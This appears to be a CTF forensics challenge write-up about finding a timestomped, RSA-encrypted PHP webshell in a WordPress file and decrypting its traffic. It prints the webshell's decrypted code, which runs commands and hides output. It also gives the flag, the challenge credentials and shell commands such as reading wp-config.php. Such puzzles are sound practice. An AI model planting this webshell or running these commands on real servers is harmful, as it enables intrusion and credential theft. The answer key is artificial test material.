Description:
Our systems recently got ransomwared, and we tracked the origin to our web server. We're not sure how they got access, can you find out?
[infected.zip] [infected.pcapng]
A copy of all the web server files and incoming traffic are given to the participants, along with a description that asks them how an attacker got access to a webserver. A webshell had been placed there previously (and timestomped so sorting by most recently modified won't help) that uses 3 layers of asymmetric encryption to communicate with the host through a normal-seeming POST request. In addition, tens of thousands of other HTTP requests were sent to his server through WPScan, nikto, dirb, manual browsing, etc.
The goal is to identify the webshell stored in wordpress/wp-includes/date.php and isolate all traffic belonging to it. This may be done in either order, either identifying the weird code in the file first, or isolating the malicious traffic (the only HTTP traffic with POST data also) first. Many attempts have been made to make the POST requests fit in with normal traffic (including putting the payload in HTTP multipart/form data, spoofing user agent, etc.). The timing of the shell commands were also made so they weren't sent in chunks, but rather spread across the entire capture.
Once finding the code and traffic, only the first part has been done. Then, the user must extract a decryption key from the POST data to decrypt the PHP code, then extract a second decryption key to decrypt the commands being sent to the server. This must be done for each shell interaction until the command with the flag is decrypted. Also note that the command responses CANNOT be decrypted since the decryption key is not provided (stored on the attacker's server only).
An example of this is done in decrypt.php, where the shell code has been slightly modified to take in base64-encoded data from a packet capture (only the text after ...). This will print out:
$pvk1 = "-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCyYg7DzqjtPGCUT+q38iZcQDqZFC+lIxqo+g1/OhT45AMPtea0
habVZX77whFsQz5zE3fUXLZCzDnZpvtfr4Y8JSzGdL7O0qf3KAQIfk26YQeKOOje
ECNi5zUk3wf+5QUZjXnvDj+BUr78fV57zMpCBe65+mTiBpFkzsNTYo+VxwIDAQAB
AoGBAKyHPrSPer8JOHf525DRudxbmtFXvsU/cJeiUc+Nw57+GR/m1R4gbj3TDsA8
8VD+sLXoTGuux/FPSVyDrnjbcT25akm0FE+KkBZ6dNLFtOq6WQTe3N8HHDHkpqbZ
qXbmuph4MqZlDpKMbEL1cQ81MkgAdPJnljvrjpIoqn5wZ7cRAkEA1+SjeaueSCu4
4VzXTDOMkBqT5rEfJXnT7fN9eM48dXCd1LotWIL/2xcGkC4OdqT0kQiSs4pOQlcn
Lle18qOL5QJBANOFh3aaoGDfH60ecX2MHDnvHz4CSAIInlNXsPpbhWrt7blmGBeA
nuwIiaQOMzvrj084xk3nI8PMIzdgxUFveDsCQA2w1h0VIQh6nVLNTGnsqvFIfjCW
8t6xhxsD4eUTTwozhg7Db7S5Ofhu0V+7S/eCJnA8FvGDx8q1NCrgLQ2iCXECQDl2
cRKbdy5Z7zUMrDA7O//RIl+qJv3GcZyamg2ph1lBQe+3+JuJ6aKdvya+ZNTGbaxL
9DN9s42hi3+j3nKkYbkCQDy68qEICIdcLPFzv/sEN2JS1Cg21lJMH14ao0M3Di9B
G4oDHVBHCRtDGXOviR8AG0VpghDHheonDFaX5O7VXUM=
-----END RSA PRIVATE KEY-----
";
$pbk1 = "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCyucnknkBP4whz0YJrblke667f
5g4EfCmKcO2j7c+WEOWmbVBRZ/ETtqOIEM8Hp9rV605R1gJBf7tcxziEoX4wxQm5
nfAqXkHUdloGyK7p7IZTh5tX6KnckCtrwbD7EFwjWBBceVHRmnmVdtF4yIkwaD2S
4tw4O5CVYcIlIAAo6QIDAQAB
-----END PUBLIC KEY-----
";
openssl_private_decrypt($ae25f0, $decrypted, $pvk1);
$result = `{$decrypted} 2>&1`;
$encrypted = "";
$chunks = str_split($result, 116);
foreach ($chunks as $chunk) {
openssl_public_encrypt($chunk, $tmp, $pbk1);
$encrypted .= base64_encode($tmp).",";
}
echo $encrypted;$pvk1 can then be used to decrypt the command issued (the data BEFORE the ... in the packet).
Flag - SEKAI{h4rd_2_d3t3ct_w3bsh3ll}
- MySQL Password -
super_S3CUR3_mysql_P4s$w0rdd - Wordpress creds -
admin:8XT8aUF&Lj7RL4RDmF, [email protected]
Traffic generation:
- Long dirb session
- WPScan
- Nikto
- Manual browsing
- Ping
- Shell
Shell commands:
- id
- pwd
- ls
- sudo -l
- ip a
- cat ../wp-config.php
- echo 'SEKAI{h4rd_2_d3t3ct_w3bsh3ll}'
- cat /opt/flag2.txt